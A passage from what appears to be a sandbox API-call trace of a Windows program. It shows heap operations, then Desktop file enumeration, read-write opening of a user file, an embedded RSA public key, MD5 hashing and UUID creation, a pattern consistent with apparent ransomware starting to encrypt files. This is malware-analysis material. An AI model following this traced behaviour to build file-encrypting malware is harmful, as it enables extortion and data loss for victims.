Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0183.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0183.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0183.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0183.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0183.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0183.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0183.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0183.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0183.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0183.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0183.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0183.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0183.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0183.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0183.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0183.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.050] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\") returned="Desktop\\" [0183.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0183.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.050] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0183.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.051] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0183.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.051] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.051] PathFindFileNameW (pszPath="") returned="" [0183.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.051] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\*" (normalized: "c:\\users\\keecfmwgj\\desktop\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x95f69be0, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0x95f69be0, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0183.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.052] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x95f69be0, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0x95f69be0, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0183.052] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9fe5d340, ftCreationTime.dwHighDateTime=0x1d8a4d8, ftLastAccessTime.dwLowDateTime=0xa0d1f10, ftLastAccessTime.dwHighDateTime=0x1d8a71a, ftLastWriteTime.dwLowDateTime=0xa0d1f10, ftLastWriteTime.dwHighDateTime=0x1d8a71a, nFileSizeHigh=0x0, nFileSizeLow=0x3e6c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0auOdApiPMQwtk.mp3", cAlternateFileName="0AUODA~1.MP3")) returned 1 [0183.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6ff30 [0183.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f3a8 | out: hHeap=0x6a0000) returned 1 [0183.052] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\0auOdApiPMQwtk.mp3") returned=".mp3" [0183.052] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\0auOdApiPMQwtk.mp3" (normalized: "c:\\users\\keecfmwgj\\desktop\\0auodapipmqwtk.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0183.053] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=15980) returned 1 [0183.053] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0183.055] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x3e46, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0183.055] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0183.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.058] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.058] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0183.058] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x3e6c, lpOverlapped=0x0) returned 1 [0183.058] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.059] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2c4afd0 [0183.059] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.059] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0183.059] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0183.060] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0183.060] CryptHashData (hHash=0x2cbfa50, pbData=0x2c4afd0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0183.060] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0183.060] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0183.060] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0183.060] GetLastError () returned 0x0 [0183.060] SetLastError (dwErrCode=0x0) [0183.060] GetLastError () returned 0x0 [0183.060] SetLastError (dwErrCode=0x0) [0183.073] GetLastError () returned 0x0 [0183.074] SetLastError (dwErrCode=0x0) [0183.074] GetLastError () returned 0x0 [0183.074] SetLastError (dwErrCode=0x0) [0183.074] GetLastError () returned 0x0 [0183.074] SetLastError (dwErrCode=0x0) [0183.074] GetLastError () returned 0x0 [0183.074] SetLastError (dwErrCode=0x0) [0183.074] GetLastError () returned 0x0 [0183.074] SetLastError (dwErrCode=0x0) [0183.074] GetLastError () returned 0x0 [0183.074] SetLastError (dwErrCode=0x0) [0183.074] GetLastError () returned 0x0 [0183.074] SetLastError (dwErrCode=0x0) [0183.074] GetLastError () returned 0x0 [0183.074] SetLastError (dwErrCode=0x0) [0183.074] GetLastError () returned 0x0 [0183.074] SetLastError (dwErrCode=0x0) [0183.074] GetLastError () returned 0x0 [0183.074] SetLastError (dwErrCode=0x0) [0183.074] GetLastError () returned 0x0 [0183.074] SetLastError (dwErrCode=0x0) [0183.074] GetLastError () returned 0x0 [0183.074] SetLastError (dwErrCode=0x0) [0183.074] GetLastError () returned 0x0 [0183.074] SetLastError (dwErrCode=0x0) [0183.074] GetLastError () returned 0x0 [0183.074] SetLastError (dwErrCode=0x0) [0183.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0183.075] GetLastError () returned 0x0 [0183.075] SetLastError (dwErrCode=0x0) [0183.075] GetLastError () returned 0x0 [0183.075] SetLastError (dwErrCode=0x0) [0183.075] GetLastError () returned 0x0 [0183.075] SetLastError (dwErrCode=0x0) [0183.075] GetLastError () returned 0x0 [0183.075] SetLastError (dwErrCode=0x0) [0183.075] GetLastError () returned 0x0 [0183.075] SetLastError (dwErrCode=0x0) [0183.075] GetLastError () returned 0x0 [0183.075] SetLastError (dwErrCode=0x0) [0183.075] GetLastError () returned 0x0 [0183.075] SetLastError (dwErrCode=0x0) [0183.075] GetLastError () returned 0x0 [0183.075] SetLastError (dwErrCode=0x0) [0183.075] GetLastError () returned 0x0 [0183.075] SetLastError (dwErrCode=0x0) [0183.075] GetLastError () returned 0x0 [0183.075] SetLastError (dwErrCode=0x0) [0183.075] GetLastError () returned 0x0 [0183.075] SetLastError (dwErrCode=0x0) [0183.075] GetLastError () returned 0x0 [0183.075] SetLastError (dwErrCode=0x0) [0183.075] GetLastError () returned 0x0 [0183.075] SetLastError (dwErrCode=0x0) [0183.075] GetLastError () returned 0x0 [0183.075] SetLastError (dwErrCode=0x0) [0183.075] GetLastError () returned 0x0 [0183.075] SetLastError (dwErrCode=0x0) [0183.075] GetLastError () returned 0x0 [0183.076] SetLastError (dwErrCode=0x0) [0183.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0183.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0183.076] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0183.076] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0183.076] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4afd0 | out: hHeap=0x6a0000) returned 1 [0183.076] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0183.077] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0183.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.077] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0183.077] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0183.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0183.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e70) returned 0x2d43778 [0183.077] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0183.078] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0183.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2c4afd0 [0183.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0183.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d2fc98 [0183.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c98 [0183.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f3a8 [0183.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e558 [0183.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d309e8 [0183.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e630 [0183.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e618 [0183.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e648 [0183.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e660 [0183.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0183.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x6d5c88 [0183.079] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x6d5c88, Size=0x218) returned 0x2d475f0 [0183.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d47810 [0183.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e618 | out: hHeap=0x6a0000) returned 1 [0183.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e660 | out: hHeap=0x6a0000) returned 1 [0183.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4e648 | out: hHeap=0x6a0000) returned 1 [0183.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0183.079] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47810 | out: hHeap=0x6a0000) returned 1 [0183.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2c4e648 [0183.079] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0183.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2c4e660 [0183.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0183.080] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2c4e618 [0183.080] RtlAllocateHeap 